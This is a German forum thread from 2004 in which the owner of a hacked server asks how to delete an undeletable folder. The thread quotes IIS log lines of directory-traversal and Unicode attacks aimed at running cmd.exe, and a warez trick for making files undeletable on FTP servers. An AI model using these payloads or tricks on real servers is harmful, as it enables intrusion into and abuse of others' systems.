Wie Hacker FTP Ordner (undeletable files) entfernen |
||
---|---|---|
#0
| ||
13.02.2004, 22:17
...neu hier
Beiträge: 2 |
||
|
||
13.02.2004, 22:36
Moderator
Beiträge: 6466 |
#2
umh.... wenn dein Rechner tatsächlich gehackt wurde, ist der sicherste Weg:
Paltte formatieren, System neu aufsetzen. Kannst Du sicher, sein dass sich nicht jemand eine Hintertüre eingerichtet hat ? Der Fehlere beim Löschen kann evtl eine Fehler Im Dateisystem sein. Dos_eingabefenster öffnen: chkdsk [Laufwerk]: /F Welchen Ftp-Server hast Du verwendet ? __________ Durchsuchen --> Aussuchen --> Untersuchen |
|
|
||
14.02.2004, 10:56
Member
Beiträge: 1122 |
#3
Ja immmer neu formatieren !!!!!!
Anders hast du wie Joschi schon gesagt, schenll eine Hintertür drin, und nach dem Neuformatieren kannst du sicher sein, dass alles weg ist. MFG DAFRA |
|
|
||
14.02.2004, 11:16
...neu hier
Themenstarter Beiträge: 2 |
#4
den Standard ISS als FTP-Server
ich hab auch schon unter DOS versucht das Ding zu löschen vie del ftproot *.* /f /a aber hat nix gebracht :-( Da der Recher zZ nur als Webserver fungiert werde ich die Testreihe abschliessen und dann neu formatieren. Was mir aufgefallen ist beim Durchblättern der Logs: 2004-01-30 09:41:44 x:x:x:x HEAD /Rpc/..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 80 - 217.255.181.223 - 404 0 3 2004-01-30 09:41:44 x:x:x:x HEAD /Rpc/..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 80 - 217.255.181.223 - 404 0 3 2004-01-30 09:41:44 x:x:x:x HEAD /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir+c:\ 80 - 217.255.181.223 - 404 0 3 2004-01-30 09:41:46 x:x:x:x HEAD /_vti_bin/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe /c+dir+c:\ 80 - 217.255.181.223 - 404 0 3 2004-01-30 09:41:46 x.x.x.x HEAD /_vti_bin/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe /c+dir+c:\ 80 - 217.255.181.223 - 404 0 3 2004-01-30 09:41:47 x.x.x.x HEAD /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir+c:\ 80 - 217.255.181.223 - 404 0 3 2004-01-30 09:41:47 x.x.x.x HEAD /_vti_bin/..À¯..À¯..À¯..À¯..À¯../winnt/system32/cmd.exe /c+dir+c:\ 80 - 217.255.181.223 - 404 0 3 2004-01-30 09:41:47 x.x.x.x HEAD /_vti_bin/..À¯../..À¯../..À¯../winnt/system32/cmd.exe /c+dir+c:\ 80 - 217.255.181.223 - 404 0 3 2004-01-30 09:41:48 x.x.x.x HEAD /_vti_cnf/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 80 - 217.255.181.223 - 404 0 3 2004-01-30 09:41:48 x.x.x.x HEAD /_vti_cnf/..À¯..À¯..À¯..À¯..À¯../winnt/system32/cmd.exe /c+dir+c:\ 80 - 217.255.181.223 - 404 0 3 2004-01-30 09:41:48 x.x.x.x HEAD /adsamples/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 80 - 217.255.181.223 - 404 0 3 2004-01-30 09:41:49 x.x.x.x HEAD /adsamples/..À¯..À¯..À¯..À¯..À¯../winnt/system32/cmd.exe /c+dir+c:\ 80 - 217.255.181.223 - 404 0 3 2004-01-30 09:41:49 x.x.x.x HEAD /c/winnt/system32/cmd.exe /c+dir+c:\ 80 - 217.255.181.223 - 404 0 3 2004-01-30 09:41:49 x.x.x.x HEAD /cgi-bin/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 80 - 217.255.181.223 - 404 0 3 2004-01-30 09:41:51 x.x.x.x HEAD /cgi-bin/..À¯..À¯..À¯..À¯..À¯../winnt/system32/cmd.exe /c+dir+c:\ 80 - 217.255.181.223 - 404 0 3 2004-01-30 09:41:51 x.x.x.x HEAD /d/winnt/system32/cmd.exe /c+dir+c:\ 80 - 217.255.181.223 - 404 0 3 2004-01-30 09:41:51 x.x.x.x HEAD /iisadmpwd/..%2f..%2f..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe /c+dir+c:\ 80 - 217.255.181.223 - 404 0 3 2004-01-30 09:41:52 x.x.x.x HEAD /iisadmpwd/..À¯..À¯..À¯..À¯..À¯../winnt/system32/cmd.exe /c+dir+c:\ 80 - 217.255.181.223 - 404 0 3 2004-01-30 09:41:52 x.x.x.x HEAD /msaDC/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 80 - 217.255.181.223 - 404 0 3 2004-01-30 09:41:53 x.x.x.x HEAD /msaDC/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 80 - 217.255.181.223 - 404 0 3 2004-01-30 09:41:53 x.x.x.x HEAD /msadc/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 80 - 217.255.181.223 - 404 0 3 2004-01-30 09:41:54 x.x.x.x HEAD /msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir+c:\ 80 - 217.255.181.223 - 404 0 3 2004-01-30 09:41:54 x.x.x.x HEAD /msadc/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 80 - 217.255.181.223 - 404 0 3 2004-01-30 09:41:54 x.x.x.x HEAD /msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir+c:\ 80 - 217.255.181.223 - 404 0 3 2004-01-30 09:41:54 x.x.x.x HEAD /msadc/..À¯../..À¯../..À¯../winnt/system32/cmd.exe /c+dir+c:\ 80 - 217.255.181.223 - 404 0 3 2004-01-30 09:41:56 x.x.x.x HEAD /msadc/..Á¯../winnt/system32/cmd.exe /c+dir+c:\ 80 - 217.255.181.223 - 404 0 3 2004-01-30 09:41:56 x.x.x.x HEAD /msadc/..à€¯../..à€¯../..à€¯../winnt/system32/cmd.exe /c+dir+c:\ 80 - 217.255.181.223 - 404 0 3 2004-01-30 09:41:57 x.x.x.x HEAD /msadc/..à€¯../winnt/system32/cmd.exe /c+dir+c:\ 80 - 217.255.181.223 - 404 0 3 die Zeile 404 heisst doch das der Befehl rejectet wurde, oder? Dieser Beitrag wurde am 14.02.2004 um 11:16 Uhr von Reddingo editiert.
|
|
|
||
18.02.2004, 19:27
Member
Beiträge: 2176 |
#5
Hi,
ja einige Groups laden Dateien auf fremde Server mit einigen Tricks: Wer die Tricks kennt weiss natürlich auch gleich wie man diese undelete Dateien dann doch wieder entfernt: Das wichtigste ist auf jeden Fall nachdem du die Ordner entfernt hast, das du Deinen FTP besser absicherst!! Zitat LEKTION 1: Wie erstelle ich ein "unsichtbaren" Ordner?Das Löschen in Windows kannst du natürlich auch direkt über die Kommandozeile machen... greetz Lp Dieser Beitrag wurde am 18.02.2004 um 19:29 Uhr von Laserpointa editiert.
|
|
|
||
27.04.2004, 20:14
Member
Beiträge: 451 |
#6
Zitat Undeletable: Man kann durch einen kleinen Trick auf manchen Pubs Files unlöschbar machen. Das ist ziemlich nützlich, weil die allseits beliebten Deleter dann in die Röhre gucken. Der Trick ist ganz simpel: man lädt das File hoch und benennt es dann um, indem man an den Dateinamen einfach ein " ./ /" hängt, also LeerzeichenPunktSlashLeerzeichenSlash. Hies die Datei vorher "file.zip" so heist sie nun "file.zip ./ /" Das sieht man nicht im FTP-Proggi oder im Browser steht immer noch "file.zip". Jetzt kann sie aber niemand mehr deleten, angeblich muss auch der Administrator des FTP die Festplatte formatieren, um dieses File wieder los zu werden. Der Nachteil ist, dass jetzt auch das saugen nicht mehr so einfach geht. Damit mit man die Datei mit dem IE oder GetRigtht saugen kann, muss man an den Link noch ein Leerzeichen hängen, also <a href="file.zip%20">file</a>. Auch funzen nicht mehr alle Downloadmanager und FTP-Programme: mit CuteFTP habe ich noch kein undeletable File saugen können. Mit Wincommander oder FlashFXP ist es jeodch kein Problem.gerade gesehen wie man die erstellt ... wenn man das weiss, kann man die auch wieder löschen! Tille __________ Anonymität im Internet ist, wenn Du keinen kennst, aber alle Dich. |
|
|
||
ich hab das Problem, das mein W2K3 gehackt wurde und als Umschlagplatz
für MP3s und Filme verwendet wurde
ich habe alles soweit dich gemacht, habe aber nun in meinem FTP-Ordner einen Ordener ohne Namen, der sich auch nicht löschen lässt
Meldung: Cannot delete file: Cannot read from the source file or disk
Kann mir jmd helfen den Ordner doch wieder zu löschen?
Vielen Dank schon im Vorraus